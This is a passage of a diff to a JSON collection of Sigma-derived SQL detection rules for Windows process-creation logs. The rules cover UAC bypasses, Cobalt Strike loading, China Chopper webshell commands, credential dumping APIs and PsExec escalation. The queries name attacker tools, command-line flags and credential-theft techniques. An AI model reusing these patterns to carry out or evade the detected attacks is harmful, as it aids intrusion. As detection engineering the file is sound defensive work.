"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" 